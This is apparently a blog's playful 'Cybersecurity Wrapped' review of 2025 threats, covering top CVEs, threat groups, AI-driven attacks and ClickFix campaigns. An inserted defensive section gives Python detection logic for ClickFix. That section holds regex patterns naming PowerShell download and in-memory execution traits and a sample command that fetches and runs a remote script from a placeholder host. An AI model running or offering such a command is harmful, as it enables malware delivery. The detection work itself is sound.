Welcome to your 2025 Cybersecurity Wrapped.
It’s been a year. We laughed (nervously), we cried (over our budgets), and we patched (endlessly). While you were busy trying to explain to your board why the coffee machine now needs MFA, the threat landscape was evolving faster than a generative AI hallucination.
You spent 8,760 hours defending the perimeter this year. Let’s see what defined your chaos.
What to Remember
- Social Engineering Spiked: Attackers moved from hacking firewalls to hacking people, with groups like Scattered Spider targeting help desks.
- AI Weaponization: 2025 marked the shift from experimental AI to weaponized AI, including deepfakes and prompt injection attacks.
- Major CVEs: React2Shell (CVE-2025-55182) and SharePoint flaws defined the year’s most critical vulnerabilities.
- State-Sponsored Threats: Groups like Salt Typhoon targeted the internet’s backbone, while North Korean actors funded weapons programs via IT worker fraud.
Top 10 CVEs of 2025
The year 2025 marked a massive acceleration in vulnerability exploitation, with over 21,500 CVEs published in the first half alone. Here are the tracks that broke the internet.
1. CVE-2025-55182 (React2Shell)
- The “Song of the Year.” Dubbed the “Log4Shell of the modern web,” this flaw in React Server Components allowed unauthenticated RCE via a single HTTP request. It turned the modern frontend into a backend open door.
2. CVE-2025-53770 (SharePoint “ToolShell”)
- The Enterprise Banger. An unauthenticated deserialization flaw in SharePoint became the preferred entry point for Initial Access Brokers to infiltrate government networks.
3. CVE-2025-61882 (Oracle EBS)
- The Expensive One. The Cl0p ransomware gang used this RCE to launch one of the most aggressive extortion waves of the year, hitting hundreds of financial firms.
4. CVE-2025-59718 & 59719 (Fortinet)
- The Gatecrasher. A critical authentication bypass in FortiOS allowed attackers to walk right past the firewall without credentials.
5. CVE-2025-43300 (Apple Image I/O)
- The Silent Hit. A “Zero-Click” flaw used in spyware campaigns. Your iPhone could be infected just by receiving a malicious image.
6. CVE-2025-32463 (Sudo-Escape)
- The Classic Remastered. A privilege escalation flaw in Linux’s sudo command required urgent patching across the entire global cloud infrastructure.
7. CVE-2025-6558 (Chrome/WebKit)
- The Drive-By. A sandbox escape via the ANGLE graphics engine allowed computers to be compromised simply by visiting a website.
8. CVE-2025-10035 (Fortra GoAnywhere)
- The Sequel. Like the MOVEit hacks of ‘23, this file transfer vulnerability was used to mass-exfiltrate corporate data before encryption.
9. CVE-2025-53690 (Sitecore)
- The Throwback. Attackers exploited hardcoded machine keys in legacy CMS deployments, hitting thousands of unhardened enterprise sites.
10. CVE-2025-8671 (MadeYouReset)
- The Remix. An evolution of the HTTP/2 “Rapid Reset” flaw, allowing ultra-efficient DDoS attacks to paralyze web services with minimal effort.
The “Top Artists” of Threat Actors
If threat groups were bands, these were the headliners selling out stadiums (and draining wallets) in 2025.
1. Scattered Spider & The Social Engineers
- The Vibe: “Hey, it’s IT support. We need your 2FA code.”
- The Hit Single: The Help Desk Hustle.
In 2025, attackers stopped hacking firewalls and started hacking people. Groups like Scattered Spider and “Luna Moth” targeted Business Process Outsourcing (BPO) firms and help desks, impersonating employees to bypass security controls. From M&S to Cognizant, no one was safe from a smooth talker on the phone.
2. Salt Typhoon
- The Vibe: Silent, deep, and state-sponsored.
- The Hit Single: Tele-Comprised.
This Chinese state-aligned group went after the backbone of the internet, breaching major US and Canadian telecom providers (and even the National Guard). They didn’t want ransom; they wanted long-term surveillance on your Cisco routers.
3. North Korean “Laptop Farms”
- The Vibe: “I’m a legitimate remote worker from Texas.” (Narrator: He was not).
- The Hit Single: The Paycheck Pivot.
US authorities uncovered massive “laptop farms” where US citizens hosted computers for North Korean IT workers. It wasn’t just about collecting a paycheck; it was about funneling millions to the DPRK weapons program and planting insider threats in Fortune 500 companies.
Your Top Genres: The Attack Trends
You listened to a lot of Ransomware this year, but AI Threats really climbed the charts.
Genre 1: AI-Powered Everything
The “experimental” phase is over. Attackers used AI to write better malware, fix code errors in their exploits, and automate reconnaissance.
- Deepfake Execs: Hackers used deepfake video calls to trick employees into installing malware.
- Prompt Injection: From Google Gemini leaking emails to Microsoft Copilot data theft, attackers turned our favorite productivity tools into spies. “CometJacking” and “IDEsaster” proved that even your code editor isn’t safe.
Genre 2: The Billion-Dollar Heist
- Top Track: The ByBit Drain.
In February, North Korea’s Lazarus Group pulled off the crypto-heist of the century, stealing $1.5 Billion from ByBit via a compromised developer machine. It makes Ocean’s Eleven look like petty theft.
Genre 3: “ClickFix” Fatigue
“Update Chrome to view this content.” We saw it everywhere. From fake CAPTCHAs to bogus Word updates, ClickFix campaigns tricked millions into copying and pasting malicious PowerShell scripts. It was the “Rickroll” of malware, but with infostealers instead of Astley.
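As an added example (not code from the original post), here is Python triage logic over constructed process-creation events that picks out the ClickFix pattern a defender actually sees: an interpreter launched by explorer.exe (the Win+R Run dialog) whose command line also carries hidden-window, download or in-memory-execution traits. The event field names, the lure URL and the regex list are assumptions, not data from the post.

```python
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure typically makes the victim launch themselves.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# A parent of explorer.exe means a human typed or pasted the command
# (Run dialog, Start menu), as opposed to a service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Traits common to pasted one-liners (assumed list, extend from your own telemetry).
SUSPICIOUS_ARGS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I), "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "mshta remote script"),
]

@dataclass
class ProcessEvent:          # minimal shape of a process-creation record (assumed)
    parent_image: str
    image: str
    command_line: str

def clickfix_indicators(ev):
    """Return the ClickFix traits matched by one process-creation event."""
    image = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return []
    hits = ["interactive parent"] if parent in INTERACTIVE_PARENTS else []
    hits += [label for rx, label in SUSPICIOUS_ARGS if rx.search(ev.command_line)]
    return hits

def is_clickfix_candidate(ev):
    """Alert only when a human-launched interpreter also carries a payload trait,
    so a user simply opening a PowerShell console does not fire."""
    hits = clickfix_indicators(ev)
    return "interactive parent" in hits and len(hits) >= 2

# Constructed sample telemetry, not real incident data.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -ep bypass -c "iwr http://lure.example.invalid/fix.ps1 | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),                                   # user opened a console
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),  # scheduled task
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, is_clickfix_candidate(ev), clickfix_indicators(ev))
```

The same pasted command is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during triage of a suspected ClickFix host.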
William Blog’s Cybersecurity Wrapped
While you were reading threat intel, here’s what we published in 2025:
Total Blog Posts Published: 122
By The Numbers:
- AI Security: 30 posts
- Cybersecurity: 28 posts
- Cloud Security: 23 posts
- Vulnerability Research: 19 posts
- IAM & Identity: 8 posts
- Zero Trust: 7 posts
- Security Operations: 5 posts
Your Blog’s “Top Artist” CVEs: The vulnerabilities that haunted your feed the most:
- CVE-2025-53770 (SharePoint ToolShell) — 28 mentions
- CVE-2025-55182 (React2Shell) — 24 mentions
- CVE-2025-49596 — 18 mentions
More Stats:
- Average post length: 1,734 words
- Peak publishing month: April
- Most-used tags: “vulnerability”, “CISO”, “GCP”, “AI Security”, “RCE”
Your 2026 Vibe Check
Based on your listening history, 2026 is going to be intense.
The trend is shifting from breaking in to breaking trust. With insider threats on the rise and AI agents being weaponized (PromptPwnd), the perimeter is no longer a firewall—it’s identity.
Your Goal for 2026: Stop trusting “users” just because they have a password, and stop trusting “code” just because an AI wrote it.
Basically, if you read 10 posts this year, you’d see SharePoint mentioned 2-3 times. SharePoint really said “never log off.”
Happy New Year 2026! Stay patched.
To further enhance your cloud security and implement Zero Trust, contact me via my LinkedIn profile or [email protected]
Frequently Asked Questions (FAQ)
What was the biggest financial hack of 2025?
The Lazarus Group's theft of $1.5 Billion from ByBit via a compromised developer machine was the largest crypto-heist of the year.
What is React2Shell?
React2Shell (CVE-2025-55182) was a critical vulnerability in React Server Components that allowed unauthenticated Remote Code Execution (RCE), impacting modern web frontends.
What is the 'ClickFix' attack method?
ClickFix campaigns trick users into copying and pasting malicious PowerShell scripts to 'fix' fake errors like browser updates or CAPTCHAs.
Who are Scattered Spider?
A threat group known for social engineering attacks against help desks and BPO firms to bypass security controls and gain access to corporate networks.
What should security teams focus on for 2026?
The focus is shifting from perimeter defense to identity security ('breaking trust'), insider threats, and securing against weaponized AI agents.
Resources
- Lazarus Group ByBit Heist Reports: Analysis of the $1.5B theft.
- React2Shell (CVE-2025-55182) Advisories: Technical details on the critical React flaw.
- Salt Typhoon Telecom Breach Analysis: Reports on state-sponsored telecom infiltration.
- SharePoint ToolShell (CVE-2025-53770) Guidance: Patching and mitigation strategies.
- ClickFix Campaign Research: Threat intelligence on the fake update malware campaigns.